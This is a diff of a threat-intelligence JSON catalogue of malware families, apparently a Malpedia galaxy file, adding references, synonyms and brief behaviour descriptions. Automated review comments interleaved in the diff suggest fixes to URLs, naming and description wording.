+ "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e",
+ "value": "DNSRat"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
+ "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3",
+ "value": "EVILNUM (Javascript)"
+ },
 {
 "description": "",
 "meta": {
@@ -1950,7 +2424,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart",
- "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/"
+ "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/",
+ "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/",
+ "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/"
 ],
 "synonyms": [],
 "type": []
@@ -1968,6 +2444,7 @@
 "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
 "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
+ "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers",
 "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
 "https://blog.morphisec.com/cobalt-gang-2.0"
 ],
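Review bot: The DNSRat reference in the first hunk, `https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/`, has a `:-` in its path slug, while the SQLRat entry added in a later hunk cites what is presumably the same article as `https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/`. Two spellings of one URL look like a copy artifact rather than two distinct sources; the hyphen-only form used by the SQLRat entry is the one to keep here so both entries resolve to the same page. The EVILNUM entry's pwncode reference is plain `http://`, which is harmless but worth checking for an `https://` equivalent when the others are.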
@@ -1979,6 +2456,22 @@ "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", "value": "More_eggs" }, + { + "description": "NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu", + "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering", + "https://attack.mitre.org/software/S0228/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc", + "value": "NanHaiShu" + }, { "description": "", "meta": { 
@@ -2006,6 +2499,19 @@ "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", "value": "scanbox" }, + { + "description": "SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40", + "value": "SQLRat" + }, { "description": "", "meta": { @@ -2059,6 +2565,19 @@ "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", "value": "witchcoven" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", + "https://securelist.com/operation-applejeus/87553/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5", + "value": "AppleJeus" + }, { "description": "", "meta": { 
@@ -2171,6 +2690,19 @@
 "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302",
 "value": "Crossrider"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.darthminer",
+ "https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a8e71805-014d-4998-b21e-3125da800124",
+ "value": "DarthMiner"
+ },
 {
 "description": "",
 "meta": {
@@ -2198,6 +2730,19 @@
 "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d",
 "value": "Dummy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor",
+ "https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c221e519-fe3e-416e-bc63-a2246b860958",
+ "value": "Eleanor"
+ },
 {
 "description": "",
 "meta": {
@@ -2212,6 +2757,19 @@
 "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d",
 "value": "EvilOSX"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale",
+ "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c",
+ "value": "FailyTale"
+ },
 {
 "description": "",
 "meta": {
@@ -2482,6 +3040,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus",
 "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update",
+ "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
 "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
 "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/"
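Review bot: In the third hunk the new entry is named `"FailyTale"` (malpedia id `osx.failytale`), but its only vendor reference is the SentinelOne post whose slug reads `osx-fairytale`, which suggests the vendor's name for the family is "FairyTale" and the cluster value carries a typo inherited from the upstream id. If the upstream id must be kept as-is for the uuid mapping, the vendor spelling should at least be reachable: `"synonyms": [ "FairyTale" ],` in place of the empty list. The DarthMiner and Eleanor entries in the earlier hunks look consistent with their references.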
@@ -2514,6 +3073,7 @@ "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" ], "synonyms": [ + "FileCoder", "Findzip" ], "type": [] @@ -2521,13 +3081,27 @@ "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", "value": "Patcher" }, + { + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", + "https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de13bec0-f443-4c5a-91fe-2223dad43be5", + "value": "PintSized" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", - "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf" ], "synonyms": [], "type": [] 
@@ -2572,7 +3146,7 @@ "value": "Pwnet" }, { - "description": "", + "description": "Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", @@ -2602,6 +3176,19 @@ "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", "value": "systemd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami", + "https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317", + "value": "Tsunami (OS X)" + }, { "description": "", "meta": { @@ -2616,6 +3203,22 @@ "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail", + "https://objective-see.com/blog/blog_0x3D.html", + "https://objective-see.com/blog/blog_0x3B.html", + "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48751182-0b17-4326-8a72-41e4c4be35e7", + "value": "WindTail" + }, { "description": "", "meta": { 
@@ -2687,6 +3290,33 @@
 "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a",
 "value": "XSLCmd"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort",
+ "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b",
+ "value": "Yort"
+ },
+ {
+ "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak",
+ "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx",
+ "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c",
+ "value": "ANTAK"
+ },
 {
 "description": "",
 "meta": {
@@ -2736,9 +3366,13 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater",
 "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/"
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
+ ],
+ "synonyms": [
+ "Glimpse"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3",
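Review bot: The ANTAK entry in the first hunk is internally inconsistent about platform and casing: its description says "a webshell written in ASP.Net" and its GitHub reference points at `antak.aspx`, yet the malpedia identifier is `php.antak`, while the TwoFace webshell added earlier in this patch sits under `asp.twoface`. The identifier comes from upstream and may be what malpedia actually uses, so this is a point to confirm rather than change blindly, but the value `"ANTAK"` in all caps also differs from "Antak" as written in the description and both references; `"value": "Antak"` would match the sources. The BondUpdater hunk below it is a straightforward reference and synonym update.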
@@ -2757,6 +3391,20 @@
 "uuid": "0db05333-2214-49c3-b469-927788932aaa",
 "value": "GhostMiner"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig",
+ "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html",
+ "https://twitter.com/MJDutch/status/1074820959784321026?s=19"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4a3b9669-8f91-47df-a8bf-a9876ab8edf3",
+ "value": "OilRig"
+ },
 {
 "description": "",
 "meta": {
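Review bot: The new entry's `value` is `"OilRig"`, the name commonly used for the threat actor, yet here it labels a PowerShell malware family (`ps1.oilrig`) with an empty description, so a reader of a tag built from this value cannot tell the tooling from the group. Elsewhere in this patch the same ambiguity is resolved with a platform suffix ("pupy (ELF)", "Tsunami (OS X)", "EVILNUM (Javascript)"); following that pattern, or at minimum a one-line description stating that this entry is the PowerShell tooling attributed to the actor, would make the entry self-describing. The Twitter reference also carries a share-tracking query string; `"https://twitter.com/MJDutch/status/1074820959784321026"` is the canonical form.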
@@ -2771,6 +3419,66 @@ "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "60d7f668-66b6-401b-976f-918470a23c3d", + "value": "POWERPIPE" + }, + { + "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource", + "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4584181-f739-43d1-ade9-8a7aa21278a0", + "value": "POWERSOURCE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c07f6484-0669-44b7-90e6-f642e316d277", + "value": "PowerSpritz" + }, + { + "description": "POWERSTATS is a backdoor written in powershell.\r\nIt has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats", + "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/", + "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + 
"https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/", + "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", + "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/" + ], + "synonyms": [ + "Valyria" + ], + "type": [] + }, + "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9", + "value": "POWERSTATS" + }, { "description": "", "meta": { @@ -2797,12 +3505,26 @@ "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", "value": "POWRUNER" }, + { + "description": "The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox", + "https://twitter.com/kafeine/status/1092000556598677504" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8", + "value": "PresFox" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] 
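Review bot: The PresFox description is written relative to the moment of writing (`currently targeting Poland`, `Based on information shared, it seems...`) with a single tweet as its source, so it will keep asserting "currently" long after it stops being true. Anchor it to the observation: `"... redirects infected users to fake banking applications (observed against Polish targets in early 2019, per the referenced tweet). The PowerShell script is reported, not confirmed, to be dropped by an exploit kit."` — the tweet ID appears to date from early 2019, verify before committing to the date. The two host artifacts already named (an added root CA and a proxy PAC URL) are the parts worth keeping prominent, since they are what a defender can actually hunt for.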
@@ -2830,8 +3552,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", - "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", + "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", + "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", + "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], "synonyms": [], @@ -2899,6 +3623,19 @@ "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy", + "https://github.com/n1nj4sec/pupy" + ], + "synonyms": [], + "type": [] + }, + "uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa", + "value": "pupy (Python)" + }, { "description": "", "meta": { 
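Review bot: In the sLoad refs the Proofpoint URL is removed and re-added two positions later, so the diff shows three changes where only the Yoroi and Cybereason additions are real. If the list is generated, emit refs in a stable order (insertion order or sorted); if hand-edited, append new refs at the end so a reviewer sees additions only.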
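Review bot: `pupy (Python)` is added with an empty description even though the GitHub ref shows it is a public project, and for dual-use tooling the description is what lets an analyst separate "attacker deployed an open-source RAT" from a red-team engagement — the Cobalt Strike entry later in this file already sets that precedent. Suggested: `"description": "Pupy (n1nj4sec/pupy) is an open-source remote administration / post-exploitation tool written in Python; used by red teams and by threat actors."`, with any cross-platform claim added only if confirmed from the project README.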
@@ -2926,6 +3663,20 @@ "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (symbian)" }, + { + "description": "The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information.\r\nHALFBAKED listens for the following commands from the C2 server:\r\n\r\n info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI \r\n queries\r\n processList: Send list of process running\r\n screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)\r\n runvbs: Executes a VB script\r\n runexe: Executes EXE file\r\n runps1: Executes PowerShell script\r\n delete: Delete the specified file\r\n update: Update the specified file", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked", + "https://attack.mitre.org/software/S0151/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "095c995c-c916-488e-944d-a3f4b9842926", + "value": "HALFBAKED" + }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { 
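Review bot: The HALFBAKED description pastes FireEye's command table verbatim, including the sample-specific helper name `58d2a83f777688.78384945.ps1` on the `screenshot` line and a line wrap that splits `WMI \r\n queries`; that filename is an artifact of one sample and will be read as a stable indicator. Drop the parenthetical or mark it `(helper script name varies per sample)`, and rejoin `WMI queries`. FIN7 is only implied by the ref URL; stating it in the description makes the entry searchable by actor.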
@@ -3033,7 +3784,7 @@ "value": "Acronym" }, { - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", 
@@ -3127,7 +3878,7 @@ "value": "Agent Tesla" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. 
Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -3144,9 +3895,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", + "https://www.s21sec.com/en/blog/2017/01/alice-simplicity-for-atm-jackpotting/", + "https://www.symantec.com/security-center/writeup/2016-122104-0203-99" + ], + "synonyms": [ + "AliceATM", + "PrAlice" ], - "synonyms": [], "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", @@ -3196,7 +3952,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] 
@@ -3301,6 +4058,21 @@ "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", "value": "Alureon" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", + "https://twitter.com/0xffff0800/status/1062948406266642432", + "https://twitter.com/ViriBack/status/1062405363457118210", + "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77f2c81f-be07-475a-8d77-f59b4847f696", + "value": "Amadey" + }, { "description": "", "meta": { @@ -3317,6 +4089,20 @@ "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", "value": "AMTsol" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", + "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4", + "value": "Anatova Ransomware" + }, { "description": "", "meta": { 
@@ -3325,17 +4111,18 @@ "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" ], "synonyms": [ 
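Review bot: Of the seven changed lines in the Andromeda refs only one is an addition (the Proofpoint Transparent Tribe PDF); the other six are existing URLs swapping positions, which hides the real change. Keep refs in a stable order (insertion order, or sort them) so a diff shows additions only. The added ref is an actor report whose title does not mention Andromeda; I infer the link from the Bezigate entry elsewhere in this change citing the same PDF, but a reader of the cluster cannot, so it may deserve a word in the description.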
@@ -3471,6 +4258,19 @@ "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "05de9c50-5958-4d02-b1a0-c4a2367c2d22", + "value": "Artra Downloader" + }, { "description": "", "meta": { @@ -3626,7 +4426,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/" ], "synonyms": [], "type": [] @@ -3673,6 +4474,21 @@ "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", "value": "Aveo" }, + { + "description": "Information stealer which uses AutoIT for wrapping.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", + "https://blog.yoroi.company/research/the-ave_maria-malware/" + ], + "synonyms": [ + "AVE_MARIA" + ], + "type": [] + }, + "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25", + "value": "Ave Maria" + }, { "description": "", "meta": { 
